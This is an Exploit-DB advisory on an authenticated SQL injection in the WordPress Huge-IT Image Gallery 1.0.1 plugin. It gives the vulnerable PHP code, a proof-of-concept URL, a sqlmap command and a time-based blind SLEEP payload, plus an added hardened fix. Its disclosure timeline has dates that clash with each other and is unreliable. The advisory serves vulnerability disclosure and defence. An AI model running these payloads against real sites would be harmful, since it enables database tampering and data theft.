
Web Application Vulnerability: Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

2014-09-03 08:55
######################
# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://huge-it.com/

# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
# Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs

# Date : 2014-08-25

# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :
http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php

######################

# Vulnerable code :

function editgallery($id)
{
    global $wpdb;

    if(isset($_GET["removeslide"])){
        if($_GET["removeslide"] != ''){
            // $_GET["removeslide"] is concatenated into the DELETE statement
            // without validation or escaping: this is the injection point.
            $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");
        }
    }
    // remainder of the function not shown in the advisory
}
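As an added illustration (not code from the advisory or from the Huge-IT plugin), the same removal step with the concatenation replaced by an integer check and a `$wpdb->prepare()` placeholder. `StandInWpdb`, `editgallery_vulnerable` and `editgallery_fixed` are constructed names; the class is a minimal stand-in for WordPress's `$wpdb` so the script runs offline under the PHP CLI.

```php
<?php
// Added example, not code from the advisory or from the Huge-IT plugin.
// StandInWpdb is a constructed stand-in for WordPress's $wpdb so the script
// runs under the plain PHP CLI; its prepare() only imitates the %d placeholder.
class StandInWpdb {
    public $prefix = 'wp_';
    public $last_query = '';
    public function prepare($sql, ...$args) {
        // As in wpdb::prepare(), %d coerces each bound value to an integer.
        return vsprintf($sql, array_map('intval', $args));
    }
    public function query($sql) {
        $this->last_query = $sql;   // a real $wpdb would execute it here
        return 1;
    }
}

// The pattern from gallery_func.php: the raw GET value is spliced into SQL.
function editgallery_vulnerable(StandInWpdb $wpdb, array $get) {
    if (isset($get['removeslide']) && $get['removeslide'] != '') {
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "huge_itgallery_images WHERE id = " . $get['removeslide'] . " ");
    }
}

// Hardened version: accept only a positive integer and bind it with %d, so
// nothing beyond the digits can reach MySQL. Real plugin code should also
// gate the action on current_user_can() and check_admin_referer(); both are
// left out so the script runs outside WordPress.
function editgallery_fixed(StandInWpdb $wpdb, array $get) {
    $raw = $get['removeslide'] ?? '';
    if ($raw === '' || (string) (int) $raw !== $raw || (int) $raw <= 0) {
        return;   // reject anything that is not exactly a positive integer
    }
    $wpdb->query($wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}huge_itgallery_images WHERE id = %d", (int) $raw));
}

// Constructed requests: the advisory's PoC value, then a legitimate id.
$db = new StandInWpdb();
editgallery_vulnerable($db, ['removeslide' => '1 and 1=2']);
echo "vulnerable:        {$db->last_query}\n";
$db->last_query = '(rejected, no query issued)';
editgallery_fixed($db, ['removeslide' => '1 and 1=2']);
echo "fixed, tampered:   {$db->last_query}\n";
editgallery_fixed($db, ['removeslide' => '1']);
echo "fixed, legitimate: {$db->last_query}\n";
```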

######################

# PoC Exploit:

http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2


# Exploit Code via sqlmap:

sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
-p removeslide --dbms=mysql --level 3

[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
...
...
...
---
Place: GET
Parameter: removeslide
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---


# PoC Video:

https://www.youtube.com/watch?v=gAmb0_o3ZUc

######################

# Vulnerability Disclosure Timeline:

2014-08-25: Discovered vulnerability
2014-08-26: Vendor Notification (Web Customers Service Form)
2014-08-26: No Response/Feedback
2014-08-01: Plugin version 1.0.1 released without fix
2014-08-02: Public Disclosure

#####################

Discovered By : Claudio Viviani
http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################




Source: www.exploit-db.com/exploits/34524
